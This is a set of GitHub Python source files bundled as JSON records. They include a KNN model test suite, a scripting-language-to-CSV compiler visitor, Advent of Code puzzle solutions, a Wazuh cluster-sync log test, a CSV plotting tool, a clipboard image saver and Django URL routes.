joint distribution of apogee, period.\n    samples_joint = knn.simulate(-1, [0,2], N=100)\n\n    # Create an axis.\n    fig, ax = plt.subplots()\n\n    # Scatter the actual data.\n    ax.scatter(X[:,0], X[:,2], color='b', label='Actual Satellites')\n\n    # Scatter the simulated data.\n    ax.scatter(\n        [s[0] for s in samples_joint], [s[2] for s in samples_joint],\n        color='r', label='Dependent KNN')\n\n    # Prepare the axes.\n    ax.set_title(\n        'SIMULATE period_minutes, apogee_km LIMIT 500', fontweight='bold')\n    ax.set_xlabel('Apogee', fontweight='bold')\n    ax.set_ylabel('Period', fontweight='bold')\n    ax.set_xlim([-500, 50000])\n    ax.set_ylim([-100, 1800])\n    ax.grid()\n    ax.legend(framealpha=0, loc='upper left')\n\n    # Reveal!\n    plt.close('all')\n\n\ndef test_serialize():\n    rng = gu.gen_rng(1)\n\n    data = rng.rand(20, 5)\n    data[:10,-1] = 0\n    data[10:,-1] = 1\n\n    knn = MultivariateKnn(\n        range(5),\n        None,\n        K=10,\n        distargs={\n            'outputs': {\n                'stattypes': [\n                    'numerical',\n                    'numerical',\n                    'numerical',\n                    'numerical',\n                    'categorical'\n                ],\n                'statargs': [\n                    {},\n                    {},\n                    {},\n                    {},\n                    {'k':1}\n                ]}},\n        rng=rng)\n\n    for rowid, x in enumerate(data):\n        knn.incorporate(rowid, dict(zip(range(5), x)))\n\n    knn.transition()\n\n    metadata_s = json.dumps(knn.to_metadata())\n    metadata_l = json.loads(metadata_s)\n\n    modname = importlib.import_module(metadata_l['factory'][0])\n    builder = getattr(modname, metadata_l['factory'][1])\n    
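    # Round-trip check: the serialized metadata names its own factory as a (module, class) pair, so the concrete deserializer can be resolved dynamically and the model rebuilt from plain JSON.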
knn2 = builder.from_metadata(metadata_l, rng=rng)\n\n    # Variable indexes.\n    assert knn2.outputs == knn.outputs\n    assert knn2.inputs == knn.inputs\n    # Distargs.\n    assert knn2.get_distargs() == knn.get_distargs()\n    assert knn2.get_distargs() == knn.get_distargs()\n    # Dataset.\n    assert knn2.data == knn.data\n    assert knn2.N == knn.N\n    # Bandwidth params.\n    assert knn2.stattypes == knn.stattypes\n    assert knn2.statargs == knn.statargs\n\n\n# XXX The following three tests are very similar to test_normal_categorical. These\n# tests can be merged easily, and that should be done to reduce duplication.\n\ndef generate_real_nominal_data(N, rng=None):\n    # Generates a bivariate dataset, where the first variable x is real-valued\n    # and the second variable z is nominal with 6 levels. The real variable's\n    # mean is determined by the value of z, where there are three means\n    # corresponding to levels [(0,1), (2,3), (4,5)].\n\n    if rng is None: rng = gu.gen_rng(0)\n    T, Zv, Zc = tu.gen_data_table(\n        N, [1], [[.3, .5, .2]], ['normal'], [None], [.95], rng=rng)\n    data = np.zeros((N, 2))\n    data[:,0] = T[0]\n    indicators = [0, 1, 2, 3, 4, 5]\n    counts = {0:0, 1:0, 2:0}\n    for i in xrange(N):\n        k = Zc[0][i]\n        data[i,1] = 2*indicators[k] + counts[k] % 2\n        counts[k] += 1\n    return data, indicators\n\n\n@pytest.fixture(scope='module')\ndef knn_xz():\n    # Learns an MvKnn on the dataset generated by generate_real_nominal_data\n    # and returns the fixture for use in the next three tests.\n\n    N_SAMPLES = 250\n    data, indicators = generate_real_nominal_data(N_SAMPLES)\n    K = MultivariateKnn(\n        [0,1], None,\n        K=20,\n        M=5,\n        distargs={'outputs': {ST: [N, C], SA:[{}, {'k': len(indicators)}]}},\n        rng=gu.gen_rng(0))\n    for rowid, x in enumerate(data):\n        K.incorporate(rowid, {0:x[0], 1:x[1]})\n    K.transition()\n    return K\n\n\ndef test_joint(knn_xz):\n    # Simulate from the joint distribution of x,z (see\n    # generate_real_nominal_data) and perform a KS test at each of the\n    # subpopulations at the six levels of z.\n\n    data = np.asarray(knn_xz.data.values())\n    indicators = sorted(set(data[:,1].astype(int)))\n    joint_samples = knn_xz.simulate(-1, [0,1], N=len(data))\n    _, ax = plt.subplots()\n    ax.set_title('Joint Simulation')\n    for t in indicators:\n        # Plot original data.\n        data_subpop = data[data[:,1] == t]\n        ax.scatter(data_subpop[:,1], data_subpop[:,0], color=gu.colors[t])\n        # Plot simulated data for indicator t.\n        samples_subpop = [j[0] for j in joint_samples if j[1] == t]\n        ax.scatter(\n            np.add([t]*len(samples_subpop), .25), samples_subpop,\n            color=gu.colors[t])\n        # KS test.\n        pvalue = ks_2samp(data_subpop[:,0], samples_subpop)[1]\n        assert .05 < pvalue\n    ax.set_xlabel('z')\n    ax.set_ylabel('x')\n    ax.grid()\n\n\ndef test_conditional_indicator(knn_xz):\n    # Simulate from the conditional distribution of x|z (see\n    # generate_real_nominal_data) and perform a KS test at each of the\n    # subpopulations at the six levels of z.\n\n    data = np.asarray(knn_xz.data.values())\n    indicators = sorted(set(data[:,1].astype(int)))\n    _, ax = plt.subplots()\n    ax.set_title('Conditional Simulation Of X Given Indicator Z')\n    for t in indicators:\n        # Plot original data.\n        data_subpop = data[data[:,1] == t]\n        ax.scatter(data_subpop[:,1], data_subpop[:,0], color=gu.colors[t])\n        # Plot simulated data.\n        samples_subpop = [s[0] for s in\n            knn_xz.simulate(-1, [0], evidence={1:t}, N=len(data_subpop))]\n        ax.scatter(\n            np.repeat(t, len(data_subpop)) + .25,\n            samples_subpop, color=gu.colors[t])\n        # KS test.\n        pvalue = ks_2samp(data_subpop[:,0], samples_subpop)[1]\n        assert .1 
< pvalue\n ax.set_xlabel('z')\n ax.set_ylabel('x')\n ax.grid()\n\n\ndef test_conditional_real(knn_xz):\n # Simulate from the conditional distribution of z|x (see\n # generate_real_nominal_data) and plot the frequencies of the simulated\n # values.\n\n data = np.asarray(knn_xz.data.values())\n indicators = sorted(set(data[:,1].astype(int)))\n fig, axes = plt.subplots(2,3)\n fig.suptitle('Conditional Simulation Of Indicator Z Given X', size=20)\n # Compute representative data sample for each indicator.\n means = [np.mean(data[data[:,1]==t], axis=0)[0] for t in indicators]\n for mean, indicator, ax in zip(means, indicators, axes.ravel('F')):\n samples_subpop = [s[1] for s in\n knn_xz.simulate(-1, [1], evidence={0:mean}, N=len(data))]\n # Plot a histogram of the simulated indicator.\n ax.hist(samples_subpop, color='g', alpha=.4)\n ax.set_title('True Indicator Z %d' % indicator)\n ax.set_xlabel('Simulated Indicator Z')\n ax.set_xticks(indicators)\n ax.set_ylabel('Frequency')\n ax.set_ylim([0, ax.get_ylim()[1]+10])\n ax.grid()\n # Check that the simulated indicator agrees with true indicator.\n true_ind_a = indicator\n true_ind_b = indicator-1 if indicator % 2 else indicator+1\n counts = np.bincount(samples_subpop)\n frac = sum(counts[[true_ind_a, true_ind_b]])/float(sum(counts))\n assert .8 < frac\n","repo_name":"hiddenswitch/cgpm","sub_path":"tests/test_mvknn.py","file_name":"test_mvknn.py","file_ext":"py","file_size_in_byte":16220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"4548298214","text":"import csv\nimport os.path\nfrom SpecularLang.SpecLangTypes import Term, Operation, Type, SpecHelper, Operator, UnaryOperation\n\nfrom SpecularLang.SpecLangParser import SpecLangParser\nfrom SpecularLang.SpecLangVisitor import SpecLangVisitor\n\n\nclass SpecLangWalker(SpecLangVisitor):\n def __init__(self, save_dir='', scenes=None, talkative=1):\n self.rows = []\n self.allRows = []\n self.rowNum = 0\n self.preSceneRows = []\n self.is_prescene = True\n self.save_dir = save_dir\n self.scenes = scenes\n self.talkative = talkative\n\n def visitChoice(self, ctx:SpecLangParser.ChoiceContext):\n choices = {}\n i = 0\n while ctx.STRING(i) is not None:\n choices[\"choice{}\".format(i)] = str(ctx.STRING(i)).strip('\"')\n i += 1\n self.add_row([self.rowNum, \"Choice\", choices])\n return Term(Type.ID, '${}'.format(self.rowNum - 1))\n\n def visitDialog(self, ctx: SpecLangParser.DialogContext):\n if ctx.emotion():\n emotion = self.visit(ctx.emotion())\n i = 4\n else:\n emotion = 'Neutral'\n i = 3\n self.add_row([self.rowNum, \"Dialog\", {'speaker': str(ctx.getChild(1)), 'emotion': emotion, 'text': str(ctx.getChild(i)).strip('\"')}])\n\n def visitEmotion(self, ctx: SpecLangParser.EmotionContext):\n return ctx.getText().strip(\"(\").strip(\")\").strip('\"')\n\n def visitTerm(self, ctx: SpecLangParser.TermContext) -> Term:\n if ctx.NUMBER():\n _type = Type.NUMBER\n value = ctx.getText().strip('\"')\n elif ctx.TRUE() or ctx.FALSE():\n _type = Type.BOOL\n value = ctx.getText().strip('\"')\n elif ctx.STRING():\n _type = Type.STRING\n value = self.convert_to_specular_string_format(ctx.getText())\n elif ctx.ID():\n _type = Type.ID\n value = ctx.getText().strip('\"')\n else:\n _type = Type.NONE\n value = ctx.getText().strip('\"')\n return Term(_type, value)\n\n def visitAssignment(self, ctx: SpecLangParser.AssignmentContext):\n if ctx.GLOBAL():\n is_global = 'Yes'\n else:\n is_global = 'No'\n term = SpecHelper.to_term(self.visit(ctx.expression()))\n 
self.add_row([self.rowNum, \"Assign\", {'global': is_global, 'ID': str(ctx.ID()), 'type': term.type.value, 'assignment': term.value}], is_prescene=self.is_prescene)\n\n def visitAdd(self, ctx: SpecLangParser.AddContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitMult(self, ctx: SpecLangParser.MultContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def perform_expression(self, expression_0, expression_1, operator: Operator):\n term_0 = SpecHelper.to_term(self.visit(expression_0))\n term_1 = SpecHelper.to_term(self.visit(expression_1))\n operation = Operation(term_0, term_1, operator)\n if operation.is_either_operand_of_type_id():\n self.add_row([self.rowNum, \"Expression\", {'operator': operator.value, 'x': term_0.value, 'y': term_1.value}])\n return Term(Type.ID, '${}'.format(self.rowNum - 1))\n else:\n return operation.perform()\n\n def perform_unary_operation(self, expression, operator: Operator):\n term = SpecHelper.to_term(self.visit(expression))\n operation = UnaryOperation(self.visit(expression), operator)\n if term.type == Type.ID:\n self.add_row([self.rowNum, \"Unary\", {'operator': operator.value, 'x': term.value}])\n return Term(Type.ID, '${}'.format(self.rowNum - 1))\n else:\n return operation.perform()\n\n def visitEqual(self, ctx: SpecLangParser.EqualContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitAnd(self, ctx: SpecLangParser.AndContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitOr(self, ctx: SpecLangParser.OrContext):\n return self.perform_expression(ctx.expression(0), ctx.expression(1), Operator(str(ctx.getChild(1))))\n\n def visitUnary(self, ctx: SpecLangParser.UnaryContext):\n return self.perform_unary_operation(ctx.expression(), Operator(str(ctx.getChild(0))))\n\n def visitParen(self, ctx: SpecLangParser.ParenContext):\n return self.visit(ctx.expression())\n\n def visitScene_statement(self, ctx:SpecLangParser.Scene_statementContext):\n if self.scenes is None or str(ctx.STRING())[1:-1] in self.scenes:\n self.is_prescene = False\n self.rows = self.preSceneRows.copy()\n self.rowNum = len(self.preSceneRows)\n self.visit(ctx.block())\n self.add_row([self.rowNum, \"StopScene\", {}])\n self.write_rows(self.rows, str(ctx.STRING())[1:-1])\n self.rows = []\n self.rowNum = 0\n self.is_prescene = True\n\n def visitIfstatement(self, ctx: SpecLangParser.IfstatementContext):\n current_row = self.rowNum\n term = SpecHelper.to_term(self.visit(ctx.expression()))\n# elseifs = ctx.else_if_statement()\n elseifs = []\n else_state = ctx.else_statement()\n elses_exist = elseifs != [] or else_state is not None\n if str(term.value) == 'True':\n self.visit(ctx.block())\n elif str(term.value) == 'False' and not elses_exist:\n return\n else:\n elif_count = 0\n self.add_row([self.rowNum, \"If\", {'condition': term.value, 'jump': 'endIf_{}'.format(current_row) if not elses_exist else 'elseif_{}'.format(current_row)}])\n self.visit(ctx.block())\n if elses_exist:\n self.add_row([self.rowNum, \"JumpToLabel\", {'name': 'endIf_{}'.format(current_row)}])\n self.add_row([self.rowNum, \"Label\", {'name': 'elseif_{}'.format(current_row)}])\n# for elseif in elseifs:\n# elif_count += 1\n# self.visit(elseif)\n if else_state:\n #self.add_row([self.rowNum, \"Label\", {'name': 'endElif_{}_{}'.format(current_row, elif_count)}])\n 
self.visit(else_state)\n self.add_row([self.rowNum, \"Label\", {'name': 'endIf_{}'.format(current_row)}])\n\n# def visitElse_if_statement(self, ctx:SpecLangParser.Else_if_statementContext):\n# current_row = self.rowNum\n# term = self.visit(ctx.expression())\n# self.add_row([self.rowNum, \"If\", {'condition': term['value'], 'jump': 'endElif_{}'.format(current_row)}])\n# self.visit(ctx.block())\n# self.add_row([self.rowNum, \"JumpToLabel\", {'name': 'endIf_{}'.format(current_row)}])\n# self.add_row([self.rowNum, \"Label\", {'name': 'endElif_{}'.format(current_row)}])\n\n def visitElse_statement(self, ctx:SpecLangParser.Else_statementContext):\n self.visit(ctx.block())\n\n def visitWhileLoop(self, ctx:SpecLangParser.WhileLoopContext):\n current_row = self.rowNum\n self.add_row([self.rowNum, \"Label\", {'name': 'beginWhile_{}'.format(current_row)}])\n term = SpecHelper.to_term(self.visit(ctx.expression()))\n if str(term.value) == 'True':\n raise Exception(\"While loop around line: {} will run forever (which is not allowed)\".format(current_row))\n elif str(term.value) == 'False':\n self.remove_last_row()\n return\n else:\n self.add_row([self.rowNum, \"If\", {'condition': term.value, 'jump': 'endWhile_{}'.format(current_row)}])\n self.visit(ctx.block())\n self.add_row([self.rowNum, \"JumpToLabel\", {'name': 'beginWhile_{}'.format(current_row)}])\n self.add_row([self.rowNum, \"Label\", {'name': 'endWhile_{}'.format(current_row)}])\n\n\n# Canned for now\n# def visitDoWhileLoop(self, ctx:SpecLangParser.DoWhileLoopContext):\n# current_row = self.rowNum\n# term = self.visit(ctx.expression())\n# if term['value'] == 'True':\n# raise Exception(\"Do-While loop around line: {} will run forever (which is not allowed)\".format(current_row))\n# elif term['value'] == 'False':\n# return\n# else:\n# self.add_row([self.rowNum, \"Label\", {'name': 'beginDoWhile_{}'.format(current_row)}])\n# self.visit(ctx.block())\n# self.add_row([self.rowNum, \"While\", {'condition': term['value'], 'jump': 'doWhile_{}'.format(current_row)}])\n\n def visitStage_direction(self, ctx:SpecLangParser.Stage_directionContext):\n params = {}\n i = 1\n while ctx.STRING(i) is not None:\n params[\"param{}\".format(i)] = str(ctx.STRING(i)).strip('\"')\n i += 1\n self.add_row([self.rowNum, str(ctx.STRING(0)).strip('\"'), params])\n\n\n# region: Utils\n def to_bool(self, string: str):\n if string.lower() == 'true':\n return True\n elif string.lower() == 'false':\n return False\n else:\n raise ValueError('ToBool is None!')\n\n def write_rows(self, rows: [], file_name: str):\n with open(os.path.join(self.save_dir, (file_name + '.csv')), 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file, quotechar='\"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)\n csv_writer.writerow([\"---\", \"ActionName\", \"Params\"])\n csv_writer.writerows(rows)\n if self.talkative > 0:\n print(\"Scene {} saved to file: {}\".format(file_name, csv_file.name))\n\n @staticmethod\n def to_unreal_row_structure(di: {}):\n #(actor=None,characterName={},dialogueColor=(B=0,G=0,R=0,A=255))\n new_dict = \"(\"\n for x, y in di.items():\n new_dict += '(\"{}\",\"{}\"),'.format(x, y)\n new_dict = new_dict.rstrip(\",\")\n new_dict += \")\"\n return new_dict\n\n def convert_to_specular_string_format(self, str_to_convert: str):\n # If the string we are converting doesn't have quotes then we can just return it\n if str_to_convert[0] == '\"' and str_to_convert[-1] == '\"':\n return r'\\\"{}\\\"'.format(str_to_convert[1:-1])\n else:\n return 
r'\\\"{}\\\"'.format(str_to_convert)\n\n def append_to_formatted_string(self, formatted_str: str, append):\n return self.convert_to_specular_string_format(formatted_str[2:-2] + append)\n\n def add_row(self, row: [], is_prescene=False):\n if is_prescene:\n self.preSceneRows.append([row[0], row[1], self.to_unreal_row_structure(row[2])])\n else:\n self.rows.append([row[0], row[1], self.to_unreal_row_structure(row[2])])\n self.allRows.append([row[0], row[1], self.to_unreal_row_structure(row[2])])\n self.rowNum += 1\n\n def remove_last_row(self):\n self.rows.pop(-1)\n self.allRows.pop(-1)\n self.rowNum -= 1\n\n","repo_name":"Bluepuff71/SpecularLang","sub_path":"SpecularLang/SpecLangWalker.py","file_name":"SpecLangWalker.py","file_ext":"py","file_size_in_byte":10936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"652734278","text":"import os\nfrom lib import EAF_tools\n\nif __name__ == \"__main__\":\n work_path = '/home/jedle/data/Sign-Language/_source_clean/annotations/new_eafs/'\n flist = [f for f in os.listdir(work_path) if '.eaf' in f]\n slovnik_path = '/home/jedle/data/Sign-Language/dictionary/'\n slovnik = os.path.join(slovnik_path, 'dictionary_dict_v4.txt')\n\n for tmp_file in flist:\n EAF_tools.parse_EAF(tmp_file, slovnik, work_path)\n\n","repo_name":"skely/Sign-Language","sub_path":"EAF_parser.py","file_name":"EAF_parser.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73033529973","text":"import os\nimport time\n\n\nclass OSXGrab(object):\n def __init__(self, picture_folder, picture_suffix):\n self.picture_folder = picture_folder\n self.picture_suffix = picture_suffix\n\n def save_picture(self):\n date_time = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))\n picture_name = date_time + '.' + self.picture_suffix\n picture_path = os.path.join(self.picture_folder, picture_name)\n try:\n os.system('/usr/local/bin/pngpaste {}'.format(picture_path))\n if os.path.exists(picture_path):\n print('get image from pasteboard success.')\n return picture_path\n else:\n print('there is no picture in clipboard!')\n except Exception as e:\n print('get picture from clipboard error because: {}'.format(e))\n return ''\n\nif __name__ == '__main__':\n OSXGrab('.', 'png').save_picture()","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/kingname_MarkdownPicPicker/MarkdownPicPicker-master/ImageGrab/OSXGrab.py","file_name":"OSXGrab.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"22369063836","text":"from django.urls import path, include\nfrom . 
import views\nfrom django.contrib import admin\n\napp_name = \"student\"\n\n\nurlpatterns = [\n path(\"\", views.homepage, name=\"homepage\"),\n path(\"index\", views.index, name=\"index\"),\n path(\"register\", views.register_request, name=\"register\"),\n path(\"login\", views.login_request, name=\"login\"),\n path('student/', views.student_by_id, name='student_by_id'),\n path(\"newstudent\", views.creating_student, name=\"newstudent\"),\n path(\"update/\", views.update_view, name=\"update\"),\n path('api/login', views.login, name=\"api_login\"),\n path('api/update/', views.api_update, name=\"api_update\"),\n path('api/delete/', views.api_delete, name=\"api_delete\"),\n\n\n\n]\n","repo_name":"moolasudhakarreddy31/Student_App","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35566419125","text":"from collections import deque \n\nf = open(\"input.txt\", \"r\")\n#f = open(\"testInput.txt\", \"r\")\ndat = f.read()\n\ndoublingPeriod = 7\nq = deque()\n\nfor num in dat.split(\",\"):\n q.append(int(num))\nq.append(None)\n\n#print(q)\n\nfor i in range(80):\n node = q.popleft()\n \n while node is not None:\n #print(node)\n\n node -= 1\n if node < 0:\n q.append(8)\n q.append(6)\n else:\n q.append(node)\n \n node = q.popleft()\n\n q.append(None)\n #print()\n\nprint(len(q)-1)\n\n\n\n","repo_name":"rohilG/advent_of_code_2021","sub_path":"day6a.py","file_name":"day6a.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18383159031","text":"from glob import glob\nfrom mmap import mmap, ACCESS_READ\nfrom os.path import join, dirname, realpath\nfrom re import compile\n\nimport pytest\nfrom yaml import safe_load\n\ntest_data_path = join(dirname(realpath(__file__)), 'data')\nconfiguration = safe_load(open(join(test_data_path, 'configuration.yaml')))['configuration']\nnode_name = compile(r'.*/(master|worker_[\\d]+)/logs/cluster.log')\nintegrity_regex = compile(r'.*Compressing \\'files_metadata.json\\' of ([0-9]*) files.*|'\n r'(.*Files to create: ([0-9]*) \\| Files to update: '\n r'([0-9]*) \\| Files to delete: ([0-9]*) \\| Files to send: ([0-9]*).*)'.encode())\nrepeated_syncs = {}\n\n\ndef test_cluster_sync(artifacts_path):\n \"\"\"Check that the number of files synced is not identical multiple times in a row.\n\n In case that the number of files synced is identical multiple times in a row, the number of files\n for which the MD5 is calculated is also checked. 
If multiple identical syncs are repeated and the\n number of calculated MD5s does not change, the test is marked as failed.\n\n Args:\n artifacts_path (str): Path where folders with cluster information can be found.\n \"\"\"\n if not artifacts_path:\n pytest.fail('Parameter \"--artifacts_path=\" is required.')\n\n cluster_log_files = glob(join(artifacts_path, 'worker_*', 'logs', 'cluster.log'))\n if len(cluster_log_files) == 0:\n pytest.fail(f'No files found inside {artifacts_path}.')\n\n repeat_counter = 0\n for log_file in cluster_log_files:\n with open(log_file) as f:\n s = mmap(f.fileno(), 0, access=ACCESS_READ)\n sync_logs = integrity_regex.findall(s)\n if not sync_logs:\n pytest.fail(f'No integrity sync logs found in {node_name.search(log_file)[1]}')\n\n for i in range(len(sync_logs)):\n # Compare whether current log and the previous one are equal.\n if sync_logs[i][1] and sync_logs[i-2][1] and sync_logs[i-2][2:] == sync_logs[i][2:]:\n # If missing files are being synced, the number of calculated MD5 should be different\n # in the following iteration.\n if sync_logs[i][2] != b'0' or sync_logs[i][4] != b'0':\n # If same number of missing files is synced, MD5 count should remain the same.\n if sync_logs[i][2] != sync_logs[i][4]:\n if sync_logs[i-1][0] and sync_logs[i+1][0] and sync_logs[i-1] == sync_logs[i+1]:\n repeat_counter += 1\n # If only 1 shared file is synced, it could be the 'client.keys' so it doesn't count as a repeated\n # log (agents could be registering).\n elif sync_logs[i][2:] != (b'0', b'1', b'0', b'0'):\n repeat_counter += 1\n\n if repeat_counter >= configuration['repeat_threshold']:\n repeated_syncs[node_name.search(log_file)[1]] = {\n 'log': sync_logs[i][1].decode(),\n 'repeat_counter': repeat_counter\n }\n elif sync_logs[i][1]:\n repeat_counter = 1\n\n assert not repeated_syncs, '\\n' + '\\n'.join('Found {repeat_counter} times in a row in {worker}: {log}'.format(\n **values, worker=worker) for worker, values in repeated_syncs.items())\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/reliability/test_cluster/test_cluster_logs/test_cluster_sync/test_cluster_sync.py","file_name":"test_cluster_sync.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"30688451131","text":"#https://adventofcode.com/2022/day/7\r\n#from __future__ import annotations\r\n\r\nfrom typing import Iterator\r\nimport itertools_recipes as ir\r\nimport collections\r\n\r\ntest_input=\"\"\"\r\n$ cd /\r\n$ ls\r\ndir a\r\n14848514 b.txt\r\n8504156 c.dat\r\ndir d\r\n$ cd a\r\n$ ls\r\ndir e\r\n29116 f\r\n2557 g\r\n62596 h.lst\r\n$ cd e\r\n$ ls\r\n584 i\r\n$ cd ..\r\n$ cd ..\r\n$ cd d\r\n$ ls\r\n4060174 j\r\n8033020 d.log\r\n5626152 d.ext\r\n7214296 k\r\n\"\"\"\r\n\r\n\r\nclass File:\r\n def __init__(self, size, name):\r\n self.size = int(size)\r\n self.name = name\r\n\r\n def __len__(self):\r\n return self.size\r\n\r\n def __repr__(self):\r\n return f\"{type(self).__name__}({self.size!r}, {self.name!r})\"\r\n\r\n def __str__(self):\r\n return f\"{self.name} (file, size={self.size})\"\r\n\r\nclass Folder(collections.UserList):\r\n \r\n def __init__(self, name, content=()):\r\n self.name = name\r\n super().__init__(content)\r\n\r\n def __repr__(self):\r\n return f\"{type(self).__name__}({self.name!r}, {self.data!r})\"\r\n\r\n @property\r\n def size(self):\r\n return sum( x.size for x in self )\r\n\r\n def pprint(self, ident:int=0):\r\n print(\" \"*ident,\"-\", self.name, f\"(dir, 
size={self.size})\")\r\n ident+=2\r\n for x in self:\r\n if isinstance(x, type(self)):\r\n x.pprint(ident)\r\n elif isinstance(x, File):\r\n print(\" \"*ident,\"-\", x)\r\n else:\r\n print(\" \"*ident,\"UNKNOW TYPE\",repr(x))\r\n\r\n\r\n\r\ndef process_data(data:str) -> Iterator[tuple[str,...]]:\r\n \"\"\"transform the raw data into a procesable form \"\"\"\r\n return ir.isplit(ir.insert_marker(ir.interesting_lines(data),\"\",lambda x:\"$\" in x,after=False))\r\n \r\n \r\ndef get_raw_data(path:str=\"./input.txt\") -> str:\r\n with open(path) as file:\r\n return file.read()\r\n\r\ndef ls_command(data:list[str]):\r\n def make(item:str):\r\n kind, name = item.split()\r\n if kind==\"dir\":\r\n return Folder(name)\r\n if kind.isnumeric():\r\n return File(kind, name)\r\n raise ValueError(f\"unexpected item: {item!r}\")\r\n \r\n return [make(x) for x in data]\r\n\r\ndef build_folder_tree(data, current_folder:Folder=None):\r\n iter_data = iter(data)\r\n while True:\r\n try:\r\n command, *data = next(iter_data)\r\n except StopIteration:\r\n return current_folder\r\n if command == \"$ cd /\":\r\n if current_folder is None:\r\n current_folder = Folder(\"/\")\r\n continue\r\n if command == \"$ ls\":\r\n current_folder.extend(ls_command(data))\r\n continue\r\n if command == \"$ cd ..\":\r\n return current_folder\r\n if command.startswith(\"$ cd\"):\r\n _,_,name = command.split()\r\n next_folder = next( f for f in current_folder if isinstance(f,Folder) and f.name == name)\r\n build_folder_tree(iter_data, next_folder)\r\n \r\n \r\ndef walk(folder:Folder) -> Iterator[Folder]:\r\n yield folder\r\n for x in folder:\r\n if isinstance(x,Folder):\r\n yield from walk(x)\r\n\r\ndef part1(data:str) -> int:\r\n \"\"\"part 1 of the puzzle \"\"\"\r\n root = build_folder_tree(process_data(data))\r\n return sum( f.size for f in walk(root) if f.size<=100_000 )\r\n \r\n \r\n\r\ndef part2(data:str) -> None:\r\n \"\"\"part 2 of the puzzle \"\"\"\r\n root = build_folder_tree(process_data(data))\r\n total = 70000000\r\n unused = total - root.size\r\n need = 30000000\r\n candidatos = sorted(walk(root),key=lambda f:f.size)\r\n #print([c.size for c in candidatos])\r\n for folder in candidatos:\r\n free = folder.size\r\n if need < (unused + free):\r\n return free\r\n \r\n \r\n \r\ndef test1() -> bool:\r\n return 95437 == part1(test_input)\r\n\r\ndef test2() -> bool:\r\n return 24933642 == part2(test_input)\r\n\r\n\r\n\r\n#root=build_folder_tree(process_data(test_input))\r\n#root.pprint()\r\n\r\n\r\n\r\ndata = get_raw_data()\r\nassert test1(),\"fail test 1\"\r\nprint(\"solution part1\", part1(data)) #1206825\r\nassert test2(),\"fail test 2\"\r\nprint(\"solution part2\", part2(data)) #9608311\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"copperfield42/Advent-of-Code-2022","sub_path":"day07/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"872743992","text":"import click\nimport pandas as pd\nimport seaborn as sns\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\n\nsns.set_palette('bright')\nsns.set_style(\"whitegrid\")\n\ndef load_data(inputfile, xcolumn, ycolumn):\n\t# Generate a list of Path objects by searching CSV files\n\tfilepath = [Path(file) for file in inputfile]\n\t# Iterate through each path in list and open it as a DataFrame\n\tdata_frames = dict()\n\tfor path in filepath:\n\t\tdf = pd.read_csv(path)\n\t\tif (xcolumn == 'index' or ycolumn == 
'index') and 'index' not in df.columns:\n\t\t\tdf['index'] = df.index + 1\n\t\ttry:\n\t\t\tdata_frames[path.stem] = df[[xcolumn, ycolumn]]\n\t\texcept KeyError:\n\t\t\tprint(f'{path} does not have {[ col for col in [xcolumn, ycolumn] if col not in df.columns ]} column names!')\n\treturn data_frames\n\n@click.group()\ndef cli():\n\tpass\n\n@cli.command()\n@click.argument('INPUTFILE', type=click.Path(exists=True, dir_okay=False), nargs=-1, required=True)\n@click.option('-x', type=click.Tuple([str, str]), required=True, help='X axis: CSV column name and label.')\n@click.option('-y', type=click.Tuple([str, str]), required=True, help='Y axis: CSV column name and label.')\n@click.option('-t', type=click.STRING, help='Plot title.')\ndef lineplot(**kwargs):\n\tdata_frames = load_data(kwargs['inputfile'], kwargs['x'][0], kwargs['y'][0])\n\tax = None\n\tfor filename, df in data_frames.items():\n\t\tax = sns.lineplot(x=kwargs['x'][0], y=kwargs['y'][0], data=df, label=filename)\n\tax.set(title=kwargs['t'], xlabel=kwargs['x'][1], ylabel=kwargs['y'][1])\n\tplt.tight_layout()\n\tplt.show()\n\nif __name__ == '__main__':\n\tcli()","repo_name":"CesarRocha00/evobci-data-analysis","sub_path":"csv_plotter.py","file_name":"csv_plotter.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
